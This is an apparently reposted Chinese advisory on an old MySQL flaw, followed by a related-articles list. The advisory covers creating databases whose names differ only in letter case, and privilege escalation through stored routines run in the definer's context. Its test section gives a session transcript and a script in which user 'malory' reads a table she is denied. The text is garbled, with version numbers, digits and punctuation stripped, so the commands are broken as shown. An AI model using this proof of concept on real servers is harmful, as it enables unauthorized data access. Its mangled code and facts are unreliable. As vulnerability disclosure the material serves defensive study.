知识大全 MySQL权限提升及安全限制绕过漏洞

Posted 权限

篇首语:游手好闲地学习,并不比学习游手好闲好。本文由小常识网(cha138.com)小编为大家整理,主要介绍了知识大全 MySQL权限提升及安全限制绕过漏洞相关的知识,希望对你有一定的参考价值。

MySQL权限提升及安全限制绕过漏洞  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!

  受影响系统

  MySQL AB MySQL <=

  描述

  BUGTRAQ ID:

  MySQL是一款使用非常广泛的开放源代码关系数据库系统 拥有各种平台的运行版本

  在MySQL上 拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库 成功利用这个漏洞要求运行MySQL的文件系统支持区分大小写的文件名

  此外 由于在错误的安全环境中计算了suid例程的参数 攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句 成功攻击要求用户对所存储例程拥有EXECUTE权限

  测试方法

  【警 告 以下程序(方法)可能带有攻击性 仅供安全研究与教学之用 使用者风险自负!】

   创建数据库

  $ mysql h my mysql server u sample p A sampleEnter password: Wele to the MySQL monitor Commands end with ; or \\g Your MySQL connection id is to server version: standard

  mysql> create database another;ERROR : Access denied for user sample @ % to database another

  mysql> create database sAmple; Query OK row affected ( sec) 

   权限提升

   disable_warningsdrop database if exists mysqltest ;drop database if exists mysqltest ;drop function if exists f_suid; enable_warnings

  # Prepare playgroundcreate database mysqltest ;create database mysqltest ;create user malory@localhost;grant all privileges on mysqltest * to malory@localhost;

  # Create harmless (but SUID!) functioncreate function f_suid(i int) returns int return ;grant execute on function test f_suid to malory@localhost;

  use mysqltest ;# Create table in which malory@localhost will be interested but to which# he won t have any accesscreate table t (i int);

  connect (malcon localhost malory mysqltest );

  # Correct malory@localhost don t have access to mysqltest t error ER_TABLEACCESS_DENIED_ERRORselect * from mysqltest t ;

  # Create function which will allow to exploit security holedelimiter |;create function f_evil ()returns intsql security invokerbeginset @a:= current_user();set @b:= (select count(*) from mysqltest t );return ;end|delimiter ;|

  # Again correct error ER_TABLEACCESS_DENIED_ERRORselect f_evil();select @a @b;

  # Oops!!! it seems that f_evil() is executed in the context of# f_suid() definer so malory@locahost gets all info that he wantsselect test f_suid(f_evil());select @a @b;

  connection default;drop user malory@localhost;drop database mysqltest ;drop database mysqltest ; 

  建议

  厂商补丁 MySQL AB

cha138/Article/program/MySQL/201311/29307

相关参考

知识大全 绕过程序限制和利用系统表注入SQL Server

绕过程序限制和利用系统表注入SQLServer  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!  第

知识大全 MySQL 5.0.91最终版发布 修复高危漏洞

MySQL5.0.91最终版发布修复高危漏洞  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!&nbs

知识大全 MySQL 存取权限系统

MySQL存取权限系统  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!  MySQL用户名和口令  

知识大全 Form Authentication安全漏洞及对策

FormAuthentication安全漏洞及对策  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!l

知识大全 越过表单限制漏洞[3]

PHP网络开发详解:越过表单限制漏洞[3]  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 

知识大全 越过表单限制漏洞[1]

PHP网络开发详解:越过表单限制漏洞[1]  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 

知识大全 越过表单限制漏洞[2]

PHP网络开发详解:越过表单限制漏洞[2]  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 

知识大全 web上存漏洞及原理分析、防范方法(安全文件上存方法)

cha138/Article/program/PHP/201311/20937

知识大全 web上存漏洞及原理分析、防范方法(文件名检测漏洞)

  我们通过前篇<web上存漏洞及原理分析防范方法(安全文件上存方法)>已经知道后端获取服务器变量很多来自客户端传入的跟普通的getpost没有什么不同下面我们看看常见出现漏洞代码检测文件

知识大全 详解MySQL数据库提升性能的八种方法[2]

详解MySQL数据库提升性能的八种方法[2]  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!  使用